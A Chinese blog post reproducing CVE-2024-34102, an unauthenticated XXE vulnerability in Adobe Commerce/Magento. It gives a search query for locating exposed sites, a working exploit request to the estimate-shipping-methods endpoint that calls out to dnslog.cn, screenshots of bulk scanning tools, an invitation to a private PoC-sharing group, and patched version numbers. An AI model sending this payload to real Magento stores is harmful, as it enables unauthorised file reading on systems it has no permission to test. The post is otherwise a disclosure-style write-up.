【漏洞复现】Adobe Magento OR Commerce电子商务系统XXE漏洞(CVE-2024-34102)

已于 2024-06-29 16:10:54 修改
阅读量519 收藏
点赞数 17
分类专栏: 漏洞复现篇 文章标签: Adobe xxe
于 2024-06-29 15:59:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/140065586
版权

0x01 产品简介

Magento最初是一个开源的电子商务平台,后来被Adobe公司收购,并更名为Adobe Commerce,是一个功能丰富、灵活且可扩展的电子商务解决方案。Adobe Commerce提供了强大的定制能力,允许商家根据自己的业务需求进行灵活调整。通过人工智能和机器学习技术,为B2B和B2C客户提供个性化的内容、促销、推荐和网站搜索,提高转化率。能够帮助商家实现业务增长并提供卓越的购物体验。

0x02 漏洞概述

2024年6月,Adobe官方披露CVE-2024-34102 Magento estimate-shipping-methods XXE漏洞,攻击者可在无需登陆的情况下构造恶意请求利用XXE读取文件,或者结合CVE-2024-2961 可能造成远程代码执行。

0x03 搜索引擎

app="Adobe-Magento"

在这里插入图片描述

0x04 漏洞复现

POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: your-ip
Content-Type: application/json
 
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://dnslog.cn","dataIsURL":true,"options":12345678}}}}}}

在这里插入图片描述
在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

目前官方已有可更新安全版本,建议受影响用户升级至安全版本:
Adobe Commerce 安全版本:
247-p1,2.46-6,24.5-08,2.44-09,243-ext8,2.42-ext8,2.41-ext8,2.4.0-ext8,2 3.7-p4-ext8
Magento Open Source 安全版本:
2.4.7-p1,2.4.6-p6,2.4.5-p8,2.4.4-p9

SuperherRo
关注
  • 17
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Adobe Magento OR Commerce电子商务系统 XXE漏洞复现(CVE-2024-34102)
0xSec
06-28 715
2024年6月,Adobe官方披露CVE-2024-34102 Magento estimate-shipping-methods XXE漏洞,攻击者可在无需登陆的情况下构造恶意请求利用XXE读取文件,或者结合CVE-2024-2961 可能造成远程代码执行。
Magento 2.2 SQL注入漏洞
weixin_51387754的博客
12-02 1522
漏洞简介 agento(麦进斗)是一款新的专业开源电子商务平台,采用php进行开发,使用Zend Framework框架。设计得非常灵活,具有模块化架构体系和丰富的功能。 其prepareSqlCondition函数存在一处二次格式化字符串的bug,导致引入了非预期的单引号,造成SQL注入漏洞漏洞复现 使用vulhub 执行如下命令启动Magento 2.2.7: docker-compose up -d 环境启动后,访问http://your-ip:8080,即可看到Magento的安装页面。安装M
【风险通告】Adobe Magento 远程代码执行漏洞
爱国小白帽
10-21 603
[金山云安全](javascript:void(0)???? 今天 近日,金山云安全应急响应中心监测到,Adobe官方发布了CVE-2020-24407远程代码执行及CVE-2020-24400: SQL注入漏洞通告。 该漏洞风险等级为高危,请相关用户尽快将Magento Commerce/Open Source升级到最新版本,做好资产自查工作,避免遭受不必要的损失。 漏洞描述 Magento是一套专业开源的电子商务系统。本次Adobe官方发布安全公告披露了的 CVE-2020-24407远程代码执行、CV
2024年最新Goby自定义漏洞之EXP_goby写poc,2024年最新oppoGolang面试
最新发布
2401_84919801的博客
05-11 805
用guest账户登录完是这样子的,左侧菜单栏都木有的!
利用Vulnhub复现漏洞 - Magento 2.2 SQL注入漏洞
JiangBuLiu的博客
07-12 2450
Magento 2.2 SQL注入漏洞Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现登录管理员账号使用POC读取管理员的session原理理解端口设置浏览器设置BurpSuit设置 Vulnhub官方复现教程 https://vulhub.org/#/environments/magento/2.2-sqli/ 漏洞原理 Magento(麦进斗)是一款新的专业开源电子商务平台,采用ph...
PHP实例开发源码-magento开源php电子商务系统 稳定版.zip
10-15
PHP实例开发源码—magento开源php电子商务系统 稳定版.zip PHP实例开发源码—magento开源php电子商务系统 稳定版.zip PHP实例开发源码—magento开源php电子商务系统 稳定版.zip
magento开源电子商务平台 v2.1.0.zip
07-07
Magento(麦进斗)是一套专业开源的电子商务系统Magento设计得非常灵活,具有模块化架构体系和丰富的功能。易于与第三方应用系统无缝集成。其面向企业级应用,可处理各方面的需求,以及建设一个多种用途和适用面的...
magento-pocket-up-integration:将您的Magento商店与Pocket Up系统集成
03-10
composer require AbdulrhmanSobhyAlsayed/magento-pocket-up-integration php bin/magento setup:upgrade php bin/magento cache:flush 激活 要激活集成模块,必须在商店>配置> Pocket Up中定义以下参数: API...
magento开源电子商务平台 v1.8.0.0 中文版.zip
07-07
360Magento成立以来旨在打造功能强大,高度灵活的企业级电子商务平台,让中小企业用国际顶级的电商系统magento将自己的 产品更好的销往全球不再是问题。   Magento中文版介绍 基于magento-1.8.0.0-alpha1版本...
magento2-docker-compose:Magento 2与Docker Compose
04-30
使用Docker-Compose工具在多容器架构上设置Magento 2 该存储库对应于博客提到的体系结构设置。 Docker-撰写工具 如Docker文档中所述,Compose是用于定义和运行多容器Docker应用程序的工具。 通过Compose,您可以...
Adobe漏洞攻击
七域攻防实验室
08-19 490
开启msfconsole,进入攻击模块 设置攻击载荷payload 设置相关参数 确定需要修改的参数 exploit生成5303.pdf 将pdf复制到靶机里 启动监听端 设置参数 攻击 获得靶机的信息 查看 文章思绪来源于 ...
外贸网站Magento存在漏洞导致网站被攻击入侵的防护办法
网站安全专家
05-11 609
有些客户在找我们SINESAFE做网站安全服务之前,客户也找过建站的公司去清除后门,建站公司也将系统迁移升级到了最新的2.4.4版本,但后来发现问题并没有完全的解决,还是会反复的被篡改代码和用户的支付页面被劫持跳转,问题的根源是代码里已经被黑客植入后门了,数据库也被留了木马病毒,这个时候不光是要升级magento到最新版本,还得要把木马后门给彻底的清理掉,做好安全加固和防护,才能彻底的解决这个问题。第三,保存服务器的环境,以及现场的各种信息,如端口网络、应用程序、日志文件等。
magento < 1.9 xss 漏洞修复说明
weixin_33922670的博客
02-16 200
magento XSS漏洞 介绍就不说了 百度一下 到处都是这边简单记录下 处理过程, (比较粗暴,是否有效尚未验证)编辑app/design/adminhtml/default/default/template/sales/order/view/info.phtml文件搜索 getCustomerEmail 有两处 输出调用使用 htmlentities 方...
漏洞分析|Adobe ColdFusion 反序列化漏洞CVE-2023-29300)
xuandaoren的博客
11-10 1739
对于 ColdFusion 来说,WDDX 中的每个元素都是一个WddxElement,不同的元素对应着不同的Handler处理类,例如<string>标签中的元素与属性将由StringHandler处理,<struct>标签会由StructHandler处理。分析findAttribute()方法可知,参数为url.xxx表示从请求的 URL 中获取xxx的参数值,form.yyy表示从上传的表单中获取yyy的参数值。.wddx.DeserializerWorker.java文件中的显着变化。
vulhub漏洞复现38_Magento
weixin_44193247的博客
02-08 604
vuihub漏洞复现练习篇
复现vulhub中magento的2.2-sqli漏洞
YX_zjp的博客
03-17 1449
Magento(麦进斗)是一款新的专业开源电子商务平台,采用php进行开发,使用Zend Framework框架。其prepareSqlCondition函数存在一处二次格式化字符串的bug,导致引入了非预期的单引号,造成SQL注入漏洞。3、通过访问your-ip:port可以看到Magento的安装页面。时,返回的HTTP状态码不同,通过改变OR的条件,即可实现SQL BOOL型盲注。/magento-sqli.py以下载poc,poc内容为。4、分别访问链接,再通过burp suite抓包,
源码漏洞思路笔记
weixin_52657559的博客
08-14 1749
源码漏洞思路
Magento2-MVC与订单生命周期
01-12
Magento2有两个版本,分别是Magento Open Source开源版和Adobe Commerce企业收费版。 Magento Open Source是一个自托管的电子商务平台,免费提供各种电子商务网站功能。它为客户和企业提供了一个稳定的、可定制的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值